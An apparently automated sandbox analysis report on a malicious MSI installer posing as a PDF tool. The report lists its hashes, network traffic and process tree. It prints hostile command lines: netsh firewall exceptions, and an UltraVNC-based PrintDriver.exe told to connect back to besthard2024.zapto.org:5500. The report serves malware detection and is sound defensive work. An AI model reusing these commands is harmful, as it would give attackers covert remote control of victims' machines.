                                                                  MD5:C80A61EC2FFEB4F20A47DF967C372762
                                                                  SHA1:D8C7166F59BB7022A966455DE5256C9A248D8B07
                                                                  SHA-256:B29385F78B29999A6E4A4133262F5AF567372A4E30C4023E20AD0899B023B76E
                                                                  SHA-512:CFB36B5FD2B5B17F9B93EC4D83286CD6F1F7B56FEC378F816055B46075386E5D9763B2435D0685410002934E74FFC94EA2E822E18C732CD5D0032856F87FAE89
                                                                  Malicious:false
                                                                  Preview:Environment variable GUID[ not defined..

                                                                  Static File Info

                                                                  General

                                                                  File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Security: 0, Code page: 1252, Revision Number: {92C98B75-E1D1-429B-9815-3BF9C1AD8A52}, Number of Words: 10, Subject: Pdf, Author: Pdf, Name of Creating Application: Pdf (Evaluation Installer), Template: ;1033, Comments: This installer database contains the logic and data required to install Pdf. (Evaluation Installer), Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Wed Oct 9 11:42:36 2024, Last Saved Time/Date: Wed Oct 9 11:42:36 2024, Last Printed: Wed Oct 9 11:42:36 2024, Number of Pages: 450
                                                                  Entropy (8bit):7.792563695599767
                                                                  TrID:
                                                                  • Windows SDK Setup Transform Script (63028/2) 47.91%
                                                                  • Microsoft Windows Installer (60509/1) 46.00%
                                                                  • Generic OLE2 / Multistream Compound File (8008/1) 6.09%
                                                                  File name:rs8dpaIe6D.msi
                                                                  File size:7'064'064 bytes
                                                                  MD5:e21b2080c98beb0f04307a5a25630e23
                                                                  SHA1:8fc24ad51e8d61324fe8de1be667862e9238cbbb
                                                                  SHA256:0dbeaab616c483b81d9e9ed8dda14a3a8f3b024130f8fab840e7b9f3a7b1787e
                                                                  SHA512:3706fde6569bccb39e2c58e86c60050c73bcdbe5c7eb05849ced33c75b5a1c3b080746c2e27420c6fffcd3497e1b1b6ab87e1b2d371a80fa3ae27851a64cfbea
                                                                  SSDEEP:196608:QK4NkomkEmjut8DMcj4IWKPDNwmtoOCvHLNkAIdc:QKfkEmjuSMcxWKLNwunA5
                                                                  TLSH:81661221B687C03AE5AD01B7A929EE2E163DAD770B3005D7B3E4795E1D708C1627EB43
                                                                  File Content Preview:........................>...................l...................................G.......c.......w...............................Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i..................................................................

                                                                  File Icon

                                                                  Icon Hash:2d2e3797b32b2b99

                                                                  Network Behavior

                                                                  Network Port Distribution

                                                                  TCP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Oct 11, 2024 08:55:24.066333055 CEST497435500192.168.2.494.156.104.60
                                                                  Oct 11, 2024 08:55:24.072304010 CEST55004974394.156.104.60192.168.2.4
                                                                  Oct 11, 2024 08:55:24.072540998 CEST497435500192.168.2.494.156.104.60
                                                                  Oct 11, 2024 08:55:24.072711945 CEST497435500192.168.2.494.156.104.60
                                                                  Oct 11, 2024 08:55:24.077510118 CEST55004974394.156.104.60192.168.2.4
                                                                  Oct 11, 2024 08:55:24.078618050 CEST497435500192.168.2.494.156.104.60
                                                                  Oct 11, 2024 08:55:24.083420038 CEST55004974394.156.104.60192.168.2.4
                                                                  Oct 11, 2024 08:55:34.093501091 CEST497435500192.168.2.494.156.104.60
                                                                  Oct 11, 2024 08:55:34.098510027 CEST55004974394.156.104.60192.168.2.4
                                                                  Oct 11, 2024 08:55:44.109154940 CEST497435500192.168.2.494.156.104.60
                                                                  Oct 11, 2024 08:55:44.224107027 CEST55004974394.156.104.60192.168.2.4
                                                                  Oct 11, 2024 08:55:54.234389067 CEST497435500192.168.2.494.156.104.60
                                                                  Oct 11, 2024 08:55:54.239952087 CEST55004974394.156.104.60192.168.2.4
                                                                  Oct 11, 2024 08:56:04.249994993 CEST497435500192.168.2.494.156.104.60
                                                                  Oct 11, 2024 08:56:04.255058050 CEST55004974394.156.104.60192.168.2.4
                                                                  Oct 11, 2024 08:56:14.265572071 CEST497435500192.168.2.494.156.104.60
                                                                  Oct 11, 2024 08:56:14.270550966 CEST55004974394.156.104.60192.168.2.4
                                                                  Oct 11, 2024 08:56:24.281249046 CEST497435500192.168.2.494.156.104.60
                                                                  Oct 11, 2024 08:56:24.425162077 CEST55004974394.156.104.60192.168.2.4
                                                                  Oct 11, 2024 08:56:34.437764883 CEST497435500192.168.2.494.156.104.60
                                                                  Oct 11, 2024 08:56:34.442703962 CEST55004974394.156.104.60192.168.2.4
                                                                  Oct 11, 2024 08:56:44.453341961 CEST497435500192.168.2.494.156.104.60
                                                                  Oct 11, 2024 08:56:44.458283901 CEST55004974394.156.104.60192.168.2.4
                                                                  Oct 11, 2024 08:56:54.469027996 CEST497435500192.168.2.494.156.104.60
                                                                  Oct 11, 2024 08:56:54.474426031 CEST55004974394.156.104.60192.168.2.4
                                                                  Oct 11, 2024 08:57:04.484658957 CEST497435500192.168.2.494.156.104.60
                                                                  Oct 11, 2024 08:57:04.489765882 CEST55004974394.156.104.60192.168.2.4
                                                                  Oct 11, 2024 08:57:14.500298977 CEST497435500192.168.2.494.156.104.60
                                                                  Oct 11, 2024 08:57:14.505139112 CEST55004974394.156.104.60192.168.2.4

                                                                  UDP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Oct 11, 2024 08:55:20.848329067 CEST6250853192.168.2.41.1.1.1
                                                                  Oct 11, 2024 08:55:20.859401941 CEST53625081.1.1.1192.168.2.4

                                                                  DNS Queries

                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                  Oct 11, 2024 08:55:20.848329067 CEST192.168.2.41.1.1.10xea10Standard query (0)besthard2024.zapto.orgA (IP address)IN (0x0001)false

                                                                  DNS Answers

                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                  Oct 11, 2024 08:55:20.859401941 CEST1.1.1.1192.168.2.40xea10No error (0)besthard2024.zapto.org94.156.104.60A (IP address)IN (0x0001)false

                                                                  Statistics

                                                                  CPU Usage

                                                                  Click to jump to process

                                                                  Memory Usage

                                                                  Click to jump to process

                                                                  High Level Behavior Distribution

                                                                  Click to dive into process behavior distribution

                                                                  Behavior

                                                                  Click to jump to process

                                                                  System Behavior

                                                                  General

                                                                  Target ID:0
                                                                  Start time:02:55:03
                                                                  Start date:11/10/2024
                                                                  Path:C:\Windows\System32\msiexec.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\rs8dpaIe6D.msi"
                                                                  Imagebase:0x7ff608760000
                                                                  File size:69'632 bytes
                                                                  MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:1
                                                                  Start time:02:55:05
                                                                  Start date:11/10/2024
                                                                  Path:C:\Windows\System32\msiexec.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\msiexec.exe /V
                                                                  Imagebase:0x7ff608760000
                                                                  File size:69'632 bytes
                                                                  MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:false

                                                                  General

                                                                  Target ID:2
                                                                  Start time:02:55:06
                                                                  Start date:11/10/2024
                                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 09F4460A034BA1C42EB6AA8B09573B17
                                                                  Imagebase:0xc0000
                                                                  File size:59'904 bytes
                                                                  MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:3
                                                                  Start time:02:55:07
                                                                  Start date:11/10/2024
                                                                  Path:C:\Windows\Installer\MSI4384.tmp
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Windows\Installer\MSI4384.tmp" /DontWait /HideWindow /dir "C:\Games\" "C:\Games\PrintDrivers.exe" /HideWindow "C:\Games\PrintDrivers.cmd"
                                                                  Imagebase:0x420000
                                                                  File size:428'248 bytes
                                                                  MD5 hash:432827EC55428786A447B3D848D963B7
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Antivirus matches:
                                                                  • Detection: 0%, ReversingLabs
                                                                  • Detection: 0%, Virustotal, Browse
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:4
                                                                  Start time:02:55:07
                                                                  Start date:11/10/2024
                                                                  Path:C:\Games\PrintDrivers.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Games\PrintDrivers.exe" /HideWindow "C:\Games\PrintDrivers.cmd"
                                                                  Imagebase:0x580000
                                                                  File size:412'832 bytes
                                                                  MD5 hash:29ED7D64CE8003C0139CCCB04D9AF7F0
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Antivirus matches:
                                                                  • Detection: 0%, ReversingLabs
                                                                  • Detection: 0%, Virustotal, Browse
                                                                  Reputation:moderate
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:5
                                                                  Start time:02:55:08
                                                                  Start date:11/10/2024
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\Games\PrintDrivers.cmd" "
                                                                  Imagebase:0x240000
                                                                  File size:236'544 bytes
                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:6
                                                                  Start time:02:55:08
                                                                  Start date:11/10/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:7
                                                                  Start time:02:55:08
                                                                  Start date:11/10/2024
                                                                  Path:C:\Windows\SysWOW64\mode.com
                                                                  Wow64 process (32bit):true
                                                                  Commandline:Mode 90,20
                                                                  Imagebase:0x530000
                                                                  File size:26'624 bytes
                                                                  MD5 hash:FB615848338231CEBC16E32A3035C3F8
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:moderate
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:8
                                                                  Start time:02:55:08
                                                                  Start date:11/10/2024
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
                                                                  Imagebase:0x240000
                                                                  File size:236'544 bytes
                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:9
                                                                  Start time:02:55:08
                                                                  Start date:11/10/2024
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
                                                                  Imagebase:0x240000
                                                                  File size:236'544 bytes
                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:10
                                                                  Start time:02:55:08
                                                                  Start date:11/10/2024
                                                                  Path:C:\Windows\SysWOW64\reg.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
                                                                  Imagebase:0x520000
                                                                  File size:59'392 bytes
                                                                  MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:11
                                                                  Start time:02:55:08
                                                                  Start date:11/10/2024
                                                                  Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:wmic process where (name="PrintDriver.exe") get commandline
                                                                  Imagebase:0xd0000
                                                                  File size:427'008 bytes
                                                                  MD5 hash:E2DE6500DE1148C7F6027AD50AC8B891
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:12
                                                                  Start time:02:55:08
                                                                  Start date:11/10/2024
                                                                  Path:C:\Windows\SysWOW64\findstr.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:findstr /i "PrintDriver.exe"
                                                                  Imagebase:0xc20000
                                                                  File size:29'696 bytes
                                                                  MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:18
                                                                  Start time:02:55:16
                                                                  Start date:11/10/2024
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Windows\system32\cmd.exe /S /D /c" type C:\Games\PrintDriver.txt"
                                                                  Imagebase:0x240000
                                                                  File size:236'544 bytes
                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:19
                                                                  Start time:02:55:16
                                                                  Start date:11/10/2024
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:cmd
                                                                  Imagebase:0x240000
                                                                  File size:236'544 bytes
                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:20
                                                                  Start time:02:55:16
                                                                  Start date:11/10/2024
                                                                  Path:C:\Windows\SysWOW64\mode.com
                                                                  Wow64 process (32bit):true
                                                                  Commandline:Mode 90,20
                                                                  Imagebase:0x530000
                                                                  File size:26'624 bytes
                                                                  MD5 hash:FB615848338231CEBC16E32A3035C3F8
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:21
                                                                  Start time:02:55:16
                                                                  Start date:11/10/2024
                                                                  Path:C:\Windows\SysWOW64\netsh.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:netsh firewall add allowedprogram program="C:\Games\PrintDriver.exe" name="MyApplication" mode=ENABLE scope=ALL
                                                                  Imagebase:0x1560000
                                                                  File size:82'432 bytes
                                                                  MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:22
                                                                  Start time:02:55:17
                                                                  Start date:11/10/2024
                                                                  Path:C:\Windows\SysWOW64\netsh.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:netsh firewall add allowedprogram program="C:\Games\PrintDriver.exe" name="MyApplicatio" mode=ENABLE scope=ALL profile=ALL
                                                                  Imagebase:0x1560000
                                                                  File size:82'432 bytes
                                                                  MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:23
                                                                  Start time:02:55:17
                                                                  Start date:11/10/2024
                                                                  Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:wmic process where (name="PrintDriver.exe") get commandline
                                                                  Imagebase:0xd0000
                                                                  File size:427'008 bytes
                                                                  MD5 hash:E2DE6500DE1148C7F6027AD50AC8B891
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:24
                                                                  Start time:02:55:17
                                                                  Start date:11/10/2024
                                                                  Path:C:\Windows\SysWOW64\findstr.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:findstr /i "PrintDriver.exe"
                                                                  Imagebase:0xc20000
                                                                  File size:29'696 bytes
                                                                  MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:26
                                                                  Start time:02:55:19
                                                                  Start date:11/10/2024
                                                                  Path:C:\Games\PrintDriver.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Games\PrintDriver.exe -autoreconnect ID:5271523 -connect besthard2024.zapto.org:5500 -run
                                                                  Imagebase:0x7ff67da80000
                                                                  File size:2'912'200 bytes
                                                                  MD5 hash:27C1C264C6FCE4A5F44419F1783DB8E0
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 0000001A.00000000.1861273877.00007FF67DD0C000.00000002.00000001.01000000.0000000F.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 0000001A.00000002.2961021528.00007FF67DC37000.00000002.00000001.01000000.0000000F.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 0000001A.00000000.1861087410.00007FF67DC37000.00000002.00000001.01000000.0000000F.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 0000001A.00000002.2961946553.00007FF67DD0C000.00000002.00000001.01000000.0000000F.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: C:\Games\PrintDriver.exe, Author: Joe Security
                                                                  Antivirus matches:
                                                                  • Detection: 5%, ReversingLabs
                                                                  • Detection: 8%, Virustotal, Browse
                                                                  Has exited:false

                                                                  General

                                                                  Target ID:27
                                                                  Start time:02:55:19
                                                                  Start date:11/10/2024
                                                                  Path:C:\Windows\SysWOW64\timeout.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:timeout /t 1
                                                                  Imagebase:0x600000
                                                                  File size:25'088 bytes
                                                                  MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:28
                                                                  Start time:02:55:20
                                                                  Start date:11/10/2024
                                                                  Path:C:\Windows\SysWOW64\taskkill.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:taskkill /im rundll32.exe /f
                                                                  Imagebase:0x1e0000
                                                                  File size:74'240 bytes
                                                                  MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:29
                                                                  Start time:02:55:20
                                                                  Start date:11/10/2024
                                                                  Path:C:\Windows\SysWOW64\timeout.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:timeout /t 1
                                                                  Imagebase:0x600000
                                                                  File size:25'088 bytes
                                                                  MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:30
                                                                  Start time:02:55:21
                                                                  Start date:11/10/2024
                                                                  Path:C:\Windows\SysWOW64\taskkill.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:taskkill /im rundll32.exe /f
                                                                  Imagebase:0x1e0000
                                                                  File size:74'240 bytes
                                                                  MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:31
                                                                  Start time:02:55:21
                                                                  Start date:11/10/2024
                                                                  Path:C:\Windows\SysWOW64\timeout.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:timeout /t 1
                                                                  Imagebase:0x600000
                                                                  File size:25'088 bytes
                                                                  MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:32
                                                                  Start time:02:55:22
                                                                  Start date:11/10/2024
                                                                  Path:C:\Windows\SysWOW64\taskkill.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:taskkill /im rundll32.exe /f
                                                                  Imagebase:0x1e0000
                                                                  File size:74'240 bytes
                                                                  MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:33
                                                                  Start time:02:55:22
                                                                  Start date:11/10/2024
                                                                  Path:C:\Games\PrintDrivers.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Games\PrintDrivers.exe /HideWindow C:\Games\driverhelp.cmd
                                                                  Imagebase:0x580000
                                                                  File size:412'832 bytes
                                                                  MD5 hash:29ED7D64CE8003C0139CCCB04D9AF7F0
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:false

                                                                  General

                                                                  Target ID:34
                                                                  Start time:02:55:22
                                                                  Start date:11/10/2024
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\Games\driverhelp.cmd" "
                                                                  Imagebase:0x240000
                                                                  File size:236'544 bytes
                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:false

                                                                  General

                                                                  Target ID:35
                                                                  Start time:02:55:22
                                                                  Start date:11/10/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:false

                                                                  General

                                                                  Target ID:36
                                                                  Start time:02:55:22
                                                                  Start date:11/10/2024
                                                                  Path:C:\Windows\SysWOW64\mode.com
                                                                  Wow64 process (32bit):true
                                                                  Commandline:Mode 90,20
                                                                  Imagebase:0x7ff72bec0000
                                                                  File size:26'624 bytes
                                                                  MD5 hash:FB615848338231CEBC16E32A3035C3F8
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:37
                                                                  Start time:02:55:22
                                                                  Start date:11/10/2024
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
                                                                  Imagebase:0x240000
                                                                  File size:236'544 bytes
                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:38
                                                                  Start time:02:55:22
                                                                  Start date:11/10/2024
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
                                                                  Imagebase:0x240000
                                                                  File size:236'544 bytes
                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:39
                                                                  Start time:02:55:22
                                                                  Start date:11/10/2024
                                                                  Path:C:\Windows\SysWOW64\reg.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
                                                                  Imagebase:0x520000
                                                                  File size:59'392 bytes
                                                                  MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:40
                                                                  Start time:02:55:22
                                                                  Start date:11/10/2024
                                                                  Path:C:\Windows\SysWOW64\timeout.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:timeout /t 20
                                                                  Imagebase:0x600000
                                                                  File size:25'088 bytes
                                                                  MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:43
                                                                  Start time:02:55:42
                                                                  Start date:11/10/2024
                                                                  Path:C:\Windows\SysWOW64\timeout.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:timeout /t 20
                                                                  Imagebase:0x600000
                                                                  File size:25'088 bytes
                                                                  MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:44
                                                                  Start time:02:56:02
                                                                  Start date:11/10/2024
                                                                  Path:C:\Windows\SysWOW64\timeout.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:timeout /t 20
                                                                  Imagebase:0x600000
                                                                  File size:25'088 bytes
                                                                  MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:45
                                                                  Start time:02:56:22
                                                                  Start date:11/10/2024
                                                                  Path:C:\Windows\SysWOW64\timeout.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:timeout /t 20
                                                                  Imagebase:0x600000
                                                                  File size:25'088 bytes
                                                                  MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:47
                                                                  Start time:02:56:42
                                                                  Start date:11/10/2024
                                                                  Path:C:\Windows\SysWOW64\timeout.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:timeout /t 20
                                                                  Imagebase:0x600000
                                                                  File size:25'088 bytes
                                                                  MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:48
                                                                  Start time:02:57:02
                                                                  Start date:11/10/2024
                                                                  Path:C:\Windows\SysWOW64\timeout.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:timeout /t 20
                                                                  Imagebase:0x600000
                                                                  File size:25'088 bytes
                                                                  MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:false

                                                                  Disassembly

                                                                  Reset < >

                                                                    Execution Graph

                                                                    Execution Coverage:1.4%
                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                    Signature Coverage:25.3%
                                                                    Total number of Nodes:352
                                                                    Total number of Limit Nodes:7
